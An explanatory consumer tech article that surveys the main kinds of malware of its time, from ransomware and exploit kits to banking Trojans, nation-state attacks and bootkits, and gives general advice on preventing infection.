The Most Dangerous Malware Right Now and What You Can Do About It
Malware has come a long way from the time of Word macro viruses and bad screen animations. Today's malware silently infects Windows PCs, Macs and Android devices through corrupted websites, fake software updates, counterfeit apps and malicious email attachments. In many cases, users will never know their machines have been infected.
But unless you're targeted by the National Security Agency or a similar government agency, there are simple, effective ways to prevent malware infection. Installing and running antivirus programs, patching and updating software and limiting the abilities of user accounts will stop most malware. Common sense — not installing porn video players, not opening random emails or web links — will stop most of the rest.
Nevertheless, it's always best to be informed. So here's our list of the most dangerous forms of malware out there right now.
Possibly the worst kind of malware to ever affect the average computer user, encrypting ransomware makes sure you know you've been attacked. The ransomware locks up all office, image, music and movie files on a machine — tax returns, family photos, downloaded movies and ripped songs — then demands money to free the files. Restoration of locked files on a PC or Mac is sometimes possible from backup drives, but newer forms of ransomware encrypt those drives as well.
Ransoms, often payable in Bitcoin, range from a few hundred dollars for individual victims to several thousand dollars for institutions such as hospitals, law enforcement agencies and school systems. The FBI estimates that victims lost about $25 million due to ransomware in 2015 (including recovery costs), and that the number will multiply many times in 2016.
Locking ransomware, some types of which are referred to as "police Trojans," doesn't encrypt files. Instead, it freezes up a computer or mobile device's screen, often with a warning that the user is under police surveillance, and demands money or a "fine" to unfreeze the screen. The world saw a wave of locking ransomware in 2012 and 2013, on both Windows PCs and Android devices, until victims figured out that restarting a machine in safe mode would bypass the lock screen. Criminals moved on to distributing encrypting ransomware instead.
Browser exploits kits aren't just one kind of malware. They're toolkits of malware, each aimed at a particular flaw in a browser plugin such as Adobe Flash Player, Microsoft Silverlight or other multimedia software. As an infected web page containing an exploit kit loads, the kit detects the type and version of the visiting browser, its installed plugins and the underlying operating system. (Windows PCs are most at risk.) The exploit kit then launches attacks tailored for that configuration.
If something gets through the browser's defenses, it's called a drive-by download, because the victim has only to load a web page to become infected. Administrators of web pages hosting exploit kits often aren't even aware of it; criminals break into servers to add code to pages, or take advantage of the chaotic online-ad market to place malicious ads (or "malvertising") onto well-known, supposedly clean websites.
Botnet malware doesn't steal information or extract money. Instead, it secretly borrows some of your PC's processing power, roping the infected machine into forming a virtual supercomputer, or botnet, with dozens or hundreds of other "robot" machines. Many botnets can be rented by the hour by criminals, who use them to crack passwords, send out spam or launch distributed denial-of-service (DDoS) attacks against websites. Most users won't learn their machines are part of a botnet until the computer slows down mysteriously, or the internet service provider complains that there's too much outgoing traffic.
A banking Trojan will infect a web browser and silently wait until a user logs into an online bank account. The banking Trojan then records the account's username and password, and tries to capture any additional login credentials, such as a CAPTCHA or onscreen keyboard. For some banking Trojans, the job is done when the account credentials are sent to a criminal in Eastern Europe or Brazil. But other banking Trojans are more sophisticated, and will log back into the bank account just after the user has logged out, then initiate account-balance transfers that end up with your money being sent to a bank overseas.
If you're familiar with the Target, Home Depot or Neiman Marcus data breaches, then you're familiar with point-of-sale (PoS) infostealers. These specialized forms of malware infect checkout-counter card readers, or the backroom servers that run them, to steal credit-card numbers en masse. Contrary to what many people believe, the new "chip" cards don't stop credit-card theft. Instead, they make it much harder to do anything with the stolen data, as it's very difficult to create a "clone" of a chipped card.
Because most computers and websites don't save actual passwords, but instead save password "hashes" that can't be reversed, information thieves often need to rely on keyloggers to steal login credentials. The earliest keyloggers were USB sticks discreetly plugged into PCs, but today, keyloggers are small programs hiding in your computer to keep track of everything you type. If your online bank account asks you to enter your password by clicking letters on an on-screen keyboard, the account is trying to evade keyloggers.
It doesn't affect ordinary computer users, but malware created by national intelligence agencies to target specific groups or individuals is powerful, pervasive and nearly unstoppable. Much of it uses zero-day exploits unknown to the wider world, but developed and sold to intelligence agencies by private individuals and companies. Russia and China are well-known for breaking into Western corporations and government agencies, but Spain, Israel, Pakistan, Iran and India have also been suspected of hacking other countries' protected systems. North Korea stands out for the sheer brazenness of its attacks, and the U.S. National Security Agency's methods are thought to be years ahead of those used by other nations.
Malware may already have been used by nation-states to sabotage adversaries' infrastructures. No attribution has been confirmed, but the general consensus is that the U.S. and Israel used the Stuxnet worm to destroy Iranian uranium-processing equipment; Iran used the Shamoon malware to wipe the hard drives of hundreds of computers at the Saudi national oil company; and North Korea used a variant of Shamoon to wipe hard drives at Sony Pictures Entertainment over what the country's government perceived to be an insulting movie. Lower-level cyberattacks are routinely launched at South Korea, presumably by North Korea, and similar attacks have plagued the former Soviet republics of Estonia, Georgia and Ukraine during times of conflict with Russia.
By loading itself directly into a computer's running memory during infection, fileless malware escapes disk scans and thereby evades antivirus software. There's no rogue software written on the hard drive, and hence nothing to find. Some fileless malware achieves persistence, or manages to survive a reboot, by writing subtle instructions in the Windows Registry to reach out to the Internet and load the malware again with every system startup.
Antivirus software can now find and remove most strains of rootkits, pieces of malware that burrow deep into the operating system. Far more difficult to remove are bootkits, which install themselves in places that ordinary antivirus software can't reach. Such places include the BIOS (basic input-output system) that starts a computer-boot process when you press the power button, or the master boot record, the hidden partition on a Windows computer's hard drive that manages the second stage in the boot process.